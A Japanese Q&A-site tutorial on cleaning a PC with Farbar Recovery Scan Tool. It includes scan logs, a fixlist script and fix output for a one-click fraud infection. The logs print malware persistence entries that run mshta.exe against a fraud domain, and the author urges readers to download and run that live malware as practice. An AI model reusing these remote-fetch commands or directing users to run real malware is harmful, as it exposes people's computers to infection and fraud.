ここから本文です

この知恵ノートを「知恵コレクション」に追加しました。

追加した知恵ノートはMy知恵袋の「知恵コレクション」ページで確認できます。

知恵コレクション」に登録済みです。

再登録しました。

追加に失敗しました。

ノートに戻り、もう一度やり直してください。

すでに1,000件のノートが登録されています。

新しく追加したい場合は、My知恵袋の「知恵コレクション」ページで登録されているノートを削除してください。

追加できませんでした。

ノートは削除されました。

Farbar recovery scan tool使い方

ライターさん(最終更新日時:2015/11/6)投稿日:

  • ナイス!:

    2

  • 閲覧数:615

印刷用のページを表示する



● Farbar recovery scan tool使い方

http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/

OSが32 bitなのか、64bitなのか、是非確認し、適切な方をダウンロードしてほしい。



http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
(チュートリアル)

❶事前の準備として

デスクトップ上に新しいフォルダを作成して欲しい。フォルダ名は「FRST」などなど(なんでもよい)。そのフォルダの中に、Farbar recovery scan toolをダウンロードしておいてほしい。FRST.exeは32bit版、64bit版があるから、己のPC環境に適したバージョンをダウンロードすること。

FRST.exe自体は「管理者権限」で起動させること。起動するとupdate時間(最新の状態にするまでに、少し時間がかかる)があるので、ちょっと待機。尚、この時FRST.exeのコンソール画面を見て「Addition.tx」に☑が入っているか否か?を確認すること。☑が無い場合は、✔を入れてほしい。

[Scan] これをクリックするとscanが始まる。

程なくして、「FRST.txt-メモ帳」が吐出されてくる=logである。また同時に「Addition.txt」も吐出されてくるので(log)これも、重要なlogとして熟読すること。

a) 「FRST.txt」と
B) 「Addition.txt」
この2つのlogから、Fixスクリプトを作成するというわけ。

❷実際の使い方

まずトレーニングをしてみよう。実際に使ってみないことには、チュートリアルなど100回読んでも理解できないからだ。こんなときは「ワンクリウエア」で実験するのが、一番理解しやすい。そこで

sakura317.pw/



ワンクリウエアをダウンロードしてほしい。で、デスクトップ上に保存し、それから実行へ。


❸FRSTを起動させ、Scanをしてみよう

 FRSTキャプチャ.JPG

そしてlogの結果は?

HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]

=> mshta.exe htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT&log=1
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT] =>

mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\RunOnce: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]

=> mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT


Task: {A44F204A-32DC-4728-BFAC-52C3EC63807E} - System32\Tasks\RegWrite => mshta.exe htp://sakura317

●/...MF5IBvTJjZKtLgT
 

Task: {B2D65560-A336-4130-A2D9-282DACC677E7} - System32\Tasks\SystemBoot => mshta.exe htp://sakura317

●/...MF5IBvTJjZKtLgT


FRST.txtと、Addition.txtの両方を吟味し、自動実行のエントリが作成されている点と、タスクスケジューラが生成登録されていることが分かったネ。

❺Fixスクリプトの作成をすること

----------------------(破線以下がFixスクリプトである)---------------

Start

Closeprocesses:
Emptytemp:


HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]

=> mshta.exe htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT&log=1
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\Run: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT] =>

mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000\...\RunOnce: [RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT]

=> mshta.exe htp://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT


Task: {A44F204A-32DC-4728-BFAC-52C3EC63807E} - System32\Tasks\RegWrite => mshta.exe

htt://sakura317.pw/pcsz922/set_inf2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT
 

Task: {B2D65560-A336-4130-A2D9-282DACC677E7} - System32\Tasks\SystemBoot => mshta.exe

htp://sakura317.pw/pcsz922/reg2.php?cccid=7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT

End


--------------------------(破線は含まず)---------------------

ここで重要な手続きがある。

*まず、Fixスクリプトの名前は必ず「fixlist.txt」としてほしい。違う名をつけると起動しない可能性がある。

*かつ、必須はこのfixlist.txtを、デスクトップ上に作成しておいた「FRST」のフォルダの中に収容してほしいという点。FRST.exeが格納されている「同一フォルダ」に、fixlist.txtも格納しないと、FIXできないのだ。

OTL by Old Timerの場合は、Fixスクリプト作成後「セーフモード下」にてFixするのが比較的安定した削除方法であるが(通常modeの場合、フリーズする確率が極めて高くFixに失敗するという理由があるから)成功率も高いけれど、比較するとこのFRSTは「通常mode」でもFixできるので、非常に使いやすいし価値が高い。また、scan速度も速いし、Fixに要する時間も短いという特徴があるんだな。

Fixに成功したら、PCを再起動させてほしい。再起動後、処理をした結果logが提示されることになる。


以下、今回のFixの結果logである



*****************

Processes closed successfully.
HKU\S-1-5-21-254916690-2023439207-755044999-1000

\Software\Microsoft\Windows\CurrentVersion\Run\\SystemBoot7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value

deleted successfully.
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000

\Software\Microsoft\Windows\CurrentVersion\Run\\RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value

deleted successfully.
 

HKU\S-1-5-21-254916690-2023439207-755044999-1000

\Software\Microsoft\Windows\CurrentVersion\RunOnce\\RegWrite7fygknpQoBiwSUk7oMF5IBvTJjZKtLgT => value

deleted successfully.
 

C:\Windows\System32\Tasks\RegWrite => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegWrite" => Key Deleted

successfully.
 

 

C:\Windows\System32\Tasks\SystemBoot => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SystemBoot" => Key Deleted

successfully.
 

EmptyTemp: => Removed 2 MB temporary data.


The system needed a reboot.

==== End of Fixlog 05:47:04 ====



このノートに関するQ&A

このノートに関するQ&Aは、まだありません。

このノートについて質問する

このノートについてライターの方に質問できます。

※ライターの方から必ず回答をいただけるとは限りません

※別ウィンドウで開きます

この知恵ノートのライター

アップロード写真

グレード知恵ノートのグレード:1-3

ピックアップ

【iPhone】修理交換の申込方法...
 ※追記※2015/1/30現在iPhone6及び6+が発売されたのを受け、情...
耳鼻科の先生に聞いた、しゃっ...
  皆さん、しゃっくりってわずらわしいですよね  ある時急に...
厄年について——意外と知られて...
厄年とは何か厄年とは文字どおり災厄に遭いやすいといわれる...
本文はここまでです このページの先頭へ